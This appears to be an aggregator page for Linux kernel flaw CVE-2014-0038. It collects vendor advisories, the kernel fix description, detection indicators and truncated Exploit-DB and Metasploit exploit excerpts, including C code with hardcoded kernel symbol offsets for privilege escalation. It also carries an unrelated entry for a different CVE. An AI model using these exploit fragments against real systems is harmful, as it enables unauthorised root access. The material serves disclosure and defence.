CVE-2014-0038
published 2014-02-06CVE-2014-0038: The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain privileges via a…
PriorityP356medium6.9CVSS 2.0
AVLACMAuNCCICAC
EXPLOIT
EPSS
34.65%
98.2th percentile
The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | linux | < linux 3.13.4-1 (bookworm) | linux 3.13.4-1 (bookworm) |
| linux | linux_kernel | >= 0 < 3.13.4-1 | 3.13.4-1 |
| linux | linux_kernel | >= 0 < 3.13.4-1 | 3.13.4-1 |
| linux | linux_kernel | >= 0 < 3.13.4-1 | 3.13.4-1 |
| linux | linux_kernel | >= 0 < 3.13.4-1 | 3.13.4-1 |
| linux | linux_kernel | >= 3.11 < 3.12.10 | 3.12.10 |
| linux | linux_kernel | >= 3.13 < 3.13.2 | 3.13.2 |
| linux | linux_kernel | >= 3.4 < 3.4.79 | 3.4.79 |
| linux | linux_kernel | >= 3.5 < 3.10.29 | 3.10.29 |
| opensuse | opensuse | — | — |
Detection & IOCsextracted from sources · hover to see the quote
filenamerecvmmsg (pre-compiled exploit binary, stored under Msf::Config.data_directory/exploits/CVE-2014-0038/)↗
bytes↗
0x90 NOP sled filling PAGE_SIZE*3 mapped region
- →Detect x32 ABI recvmmsg syscall (syscall number 0x40000000+537 = 0x40000219) issued with a crafted/non-canonical timeout pointer (e.g. (void*)1) from a non-privileged process — this is the core exploit trigger. ↗
- →Alert on mmap() calls with MAP_FIXED|MAP_ANONYMOUS|PROT_EXEC targeting high kernel-adjacent virtual addresses (0xffffffff8xxxxxxx range masked to user space) from unprivileged processes — exploit maps shellcode near kernel symbol addresses. ↗
- →Monitor for unprivileged processes opening /proc/sys/net/core/somaxconn read-only immediately after a series of x32 recvmmsg syscalls — this is the exploit's privilege-check trigger step. ↗
- →Detect opening /dev/ptmx followed immediately by close() from a process that previously issued x32 recvmmsg syscalls — used in the alternate exploit variant (EDB-31346) to trigger the overwritten fops->release pointer. ↗
- →Flag processes that drop a C source file into /tmp, compile it with gcc, chmod +x the result, and execute it — consistent with the Metasploit module's live-compile exploitation workflow. ↗
- →Alert on the presence of the hardcoded pre-compiled payload filename 'a0RwAacU' under /tmp — this is a static artifact of the Metasploit pre-compiled exploit path. ↗
- →Audit systems for CONFIG_X86_X32=y in the running kernel config — this is the required prerequisite for the vulnerability to be exploitable. ↗
- →Detect long-running (up to 765 seconds) loopback UDP socket activity paired with repeated x32 recvmmsg syscalls — the exploit slowly decrements a kernel pointer byte-by-byte, one byte per ~255 seconds. ↗
- ·The vulnerability is only exploitable when the kernel is compiled with CONFIG_X86_X32=y. Most major distributions did NOT ship with this option enabled, significantly limiting exposure. ↗
- ·The hardcoded kernel offsets in the public exploits are specific to three Ubuntu 13.x kernel versions (3.8.0-19-generic, 3.11.0-12-generic, 3.11.0-15-generic); the exploit will fail on any other kernel without manual offset adaptation. ↗
- ·The exploit requires kallsyms to be protected (not readable) and uses hardcoded offsets instead — detection/mitigation via restricting /proc/kallsyms does not prevent exploitation but was a design consideration. ↗
- ·The Metasploit module sets WfsDelay to 780 seconds to account for the full exploitation time; defenders should note that exploit activity may span up to 13 minutes before privilege escalation completes. ↗
CVSS provenance
nvdv2.06.9MEDIUMAV:L/AC:M/Au:N/C:C/I:C/A:C
osv6.9MEDIUM
vendor_debian6.9LOW
vendor_redhat6.9MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wvfw-q8jv-g9r2: The compat_sys_recvmmsg function in net/compat
ghsa_unreviewed·2022-05-14
CVE-2014-0038 [MEDIUM] CWE-20 GHSA-wvfw-q8jv-g9r2: The compat_sys_recvmmsg function in net/compat
The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter.
OSV
CVE-2014-0038: The compat_sys_recvmmsg function in net/compat
osv·2014-02-06·CVSS 6.9
CVE-2014-0038 [MEDIUM] CVE-2014-0038: The compat_sys_recvmmsg function in net/compat
The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter.
Kernel
x86, x32: Correct invalid use of user timespec in the kernel
kernel_security·2014-01-30·CVSS 6.9
CVE-2014-0038 [MEDIUM] x86, x32: Correct invalid use of user timespec in the kernel
x86, x32: Correct invalid use of user timespec in the kernel
The x32 case for the recvmsg() timout handling is broken:
asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg,
unsigned int vlen, unsigned int flags,
struct compat_timespec __user *timeout)
{
int datagrams;
struct timespec ktspec;
if (flags & MSG_CMSG_COMPAT)
return -EINVAL;
if (COMPAT_USE_64BIT_TIME)
return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
flags | MSG_CMSG_COMPAT,
(struct timespec *) timeout);
...
The timeout pointer parameter is provided by userland (hence the __user
annotation) but for x32 syscalls it's simply cast to a kernel pointer
and is passed to __sys_recvmmsg which will eventually directly
dereference it for both reading and writing. Other callers to
__sys_recvmmsg
Ubuntu
Linux kernel (Raring HWE) vulnerability
vendor_ubuntu·2014-01-31
CVE-2014-0038 Linux kernel (Raring HWE) vulnerability
Title: Linux kernel (Raring HWE) vulnerability
Summary: The system could be made to crash or run programs as an administrator.
Pageexec reported a bug in the Linux kernel's recvmsg syscall when called
from code using the x32 ABI. An unprivileged local user could exploit this
flaw to cause a denial of service (system crash) or gain administrator
privileges.
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
Ubuntu
Linux kernel (Saucy HWE) vulnerability
vendor_ubuntu·2014-01-31
CVE-2014-0038 Linux kernel (Saucy HWE) vulnerability
Title: Linux kernel (Saucy HWE) vulnerability
Summary: The system could be made to crash or run programs as an administrator.
Pageexec reported a bug in the Linux kernel's recvmsg syscall when called
from code using the x32 ABI. An unprivileged local user could exploit this
flaw to cause a denial of service (system crash) or gain administrator
privileges.
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
Red Hat
Kernel: 3.4+ arbitrary write with CONFIG_X86_X32
vendor_redhat·2014-01-31·CVSS 6.9
CVE-2014-0038 [MEDIUM] Kernel: 3.4+ arbitrary write with CONFIG_X86_X32
Kernel: 3.4+ arbitrary write with CONFIG_X86_X32
The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter.
Statement: Not vulnerable. This issue does not affect the versions of the kernel package as shipped with Red Hat Enterprise Linux 5, 6 and Red Hat Enterprise MRG 2.
Package: kernel (Red Hat Enterprise Linux 5) - Not affected
Package: kernel (Red Hat Enterprise Linux 6) - Not affected
Package: realtime-kernel (Red Hat Enterprise MRG 2) - Not affected
Ubuntu
Linux kernel vulnerability
vendor_ubuntu·2014-01-31
CVE-2014-0038 Linux kernel vulnerability
Title: Linux kernel vulnerability
Summary: The system could be made to crash or run programs as an administrator.
Pageexec reported a bug in the Linux kernel's recvmmsg syscall when called
from code using the x32 ABI. An unprivileged local user could exploit this
flaw to cause a denial of service (system crash) or gain administrator
privileges.
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
Debian
CVE-2014-0038: linux - The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13...
vendor_debian·2014·CVSS 6.9
CVE-2014-0038 [MEDIUM] CVE-2014-0038: linux - The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13...
The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter.
Scope: local
bookworm: resolved (fixed in 3.13.4-1)
bullseye: resolved (fixed in 3.13.4-1)
forky: resolved (fixed in 3.13.4-1)
sid: resolved (fixed in 3.13.4-1)
trixie: resolved (fixed in 3.13.4-1)
No detection rules found.
Exploit-DB
Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (Metasploit)
exploitdb·2016-10-11·CVSS 6.9
CVE-2014-0038 [MEDIUM] Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (Metasploit)
Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "msf/core"
class MetasploitModule 'Linux Kernel 3.13.1 Recvmmsg Privilege Escalation',
'Description' => %q{
This module attempts to exploit CVE-2014-0038, by sending a recvmmsg
system call with a crafted timeout pointer parameter to gain root.
This exploit has offsets for 3 Ubuntu 13 kernels built in:
3.8.0-19-generic (13.04 default)
3.11.0-12-generic (13.10 default)
3.11.0-15-generic (13.10)
This exploit may take up to 13 minutes to run due to a decrementing (1/sec)
pointer which starts at 0xff*3 (765 seconds)
},
'License' => MSF_LICENSE,
'Author' =>
[
'h00die ', # M
Exploit-DB
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Escalation (3)
exploitdb·2014-02-02·CVSS 6.9
CVE-2014-0038 [MEDIUM] Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Escalation (3)
Linux Kernel 3.4 tv_sec is decremented
once per second and 0xff*3 is 765.
some things you could do while waiting:
* watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times
* read https://wiki.ubuntu.com/Security/Features and smirk a few times
* brew some coffee
* stare at the countdown giggly with anticipation
could probably whack the high bits of some pointer with nanoseconds,
but that would require a bunch of nulls before the pointer and then
reading an oops from dmesg which isn't that elegant.
&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes
hardcoded offsets because I only saw this on ubuntu & kallsyms is protected
anyway..
same principle will work on 32bit but I didn't really find any major
distros shipping with CONFIG_X86_X32=y
user@ubuntu:~$ uname -a
Exploit-DB
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)
exploitdb·2014-02-02·CVSS 6.9
CVE-2014-0038 [MEDIUM] Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)
Linux Kernel 3.4
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define BUFSIZE 200
#define PAYLOADSIZE 0x2000
#define FOPS_RELEASE_OFFSET 13*8
/*
* Adapt these addresses for your need.
* see /boot/System.map* or /proc/kallsyms
* These are the offsets from ubuntu 3.11.0-12-generic.
*/
#define PTMX_FOPS 0xffffffff81fb30c0LL
#define TTY_RELEASE 0xffffffff8142fec0LL
#define COMMIT_CREDS 0xffffffff8108ad40LL
#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
/*
*
Exploit-DB
Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC)
exploitdb·2014-01-31
CVE-2014-0038 Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC)
Linux Kernel 3.4 /dev/udp/127.0.0.1/1234; sleep 0.25; done
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
int
main(void)
{
#define VLEN 10
#define BUFSIZE 200
#define TIMEOUT 1
int sockfd, retval, i;
struct sockaddr_in sa;
struct mmsghdr msgs[VLEN];
struct iovec iovecs[VLEN];
char bufs[VLEN][BUFSIZE+1];
struct timespec timeout;
sockfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sockfd == -1) {
perror("socket()");
exit(EXIT_FAILURE);
}
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(1234);
if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
perror("bind()");
exit(EXIT_FAILURE);
}
memset(msgs, 0,
Metasploit
Linux Kernel recvmmsg Privilege Escalation
metasploit·CVSS 6.9
CVE-2014-0038 [MEDIUM] Linux Kernel recvmmsg Privilege Escalation
Linux Kernel recvmmsg Privilege Escalation
This module attempts to exploit CVE-2014-0038, by sending a recvmmsg system call with a crafted timeout pointer parameter to gain root. This exploit has offsets for 3 Ubuntu 13 kernels: 3.8.0-19-generic (13.04 default); 3.11.0-12-generic (13.10 default); 3.11.0-15-generic (13.10). This exploit may take up to 13 minutes to run due to a decrementing (1/sec) pointer which starts at 0xff*3 (765 seconds)
Bugzilla
CVE-2014-0038 Kernel: 3.4+ arbitrary write with CONFIG_X86_X32
bugzilla·2014-01-31·CVSS 6.9
CVE-2014-0038 [MEDIUM] CVE-2014-0038 Kernel: 3.4+ arbitrary write with CONFIG_X86_X32
CVE-2014-0038 Kernel: 3.4+ arbitrary write with CONFIG_X86_X32
Linux kernel(>= version 3.4+) built with the X32 ABI for 64-bit mode support
CONFIG_X86_X32, is vulnerable to an arbitrary write to a user supplied address.
X32 ABI allows 32-bit programs to run on 64-bit machines with all its features,
without using the 64-bit addressing. These programs continue to use 32-bit
memory addressing. The flaw occurs while doing a recvmmsg(2) call.
A user/program could use this flaw to crash the system resulting in DoS or
potentially escalate user privileges to a system.
Upstream fix:
-> https://git.kernel.org/linus/2def2ef2ae5f3990aabdbe8a755911902707d268
Reference:
-> http://www.openwall.com/lists/oss-security/2014/01/31/2
Discussion:
Statement:
Not vulnerable. This issue does not affect the
Bugzilla
CVE-2013-6434 rhev: remote-viewer spice tls-stripping issue
bugzilla·2013-12-10·CVSS 4.3
CVE-2013-6434 [MEDIUM] CVE-2013-6434 rhev: remote-viewer spice tls-stripping issue
CVE-2013-6434 rhev: remote-viewer spice tls-stripping issue
By default, remote-viewer first connects to insecure port and only switches to TLS when server requests/requires it when native spice client invocation method is used. An attacker on client local machine or on the router on the way can easily set up a MITM Evil Proxy that would pretend to be endpoint of plaintext port from client POV and it would act as a regular client to the server.
Acknowledgements:
Red Hat would like to thank Michael Samuel of Amcom for reporting this issue.
Discussion:
This issue has been addressed in following products:
RHEV Manager version 3.3
Via RHSA-2014:0038 https://rhn.redhat.com/errata/RHSA-2014-0038.html
---
Both trackers are closed, closing as handled.
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=2def2ef2ae5f3990aabdbe8a755911902707d268http://lists.opensuse.org/opensuse-security-announce/2014-02/msg00002.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-02/msg00003.htmlhttp://pastebin.com/raw.php?i=DH3Lbg54http://secunia.com/advisories/56669http://www.exploit-db.com/exploits/31346http://www.exploit-db.com/exploits/31347http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.13.2http://www.mandriva.com/security/advisories?name=MDVSA-2014:038http://www.openwall.com/lists/oss-security/2014/01/31/2http://www.securityfocus.com/bid/65255http://www.ubuntu.com/usn/USN-2094-1http://www.ubuntu.com/usn/USN-2095-1http://www.ubuntu.com/usn/USN-2096-1https://bugzilla.redhat.com/show_bug.cgi?id=1060023https://code.google.com/p/chromium/issues/detail?id=338594https://github.com/saelo/cve-2014-0038https://github.com/torvalds/linux/commit/2def2ef2ae5f3990aabdbe8a755911902707d268https://www.exploit-db.com/exploits/40503/http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=2def2ef2ae5f3990aabdbe8a755911902707d268http://lists.opensuse.org/opensuse-security-announce/2014-02/msg00002.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-02/msg00003.htmlhttp://pastebin.com/raw.php?i=DH3Lbg54http://secunia.com/advisories/56669http://www.exploit-db.com/exploits/31346http://www.exploit-db.com/exploits/31347http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.13.2http://www.mandriva.com/security/advisories?name=MDVSA-2014:038http://www.openwall.com/lists/oss-security/2014/01/31/2http://www.securityfocus.com/bid/65255http://www.ubuntu.com/usn/USN-2094-1http://www.ubuntu.com/usn/USN-2095-1http://www.ubuntu.com/usn/USN-2096-1https://bugzilla.redhat.com/show_bug.cgi?id=1060023https://code.google.com/p/chromium/issues/detail?id=338594https://github.com/saelo/cve-2014-0038https://github.com/torvalds/linux/commit/2def2ef2ae5f3990aabdbe8a755911902707d268https://www.exploit-db.com/exploits/40503/
2014-02-06
Published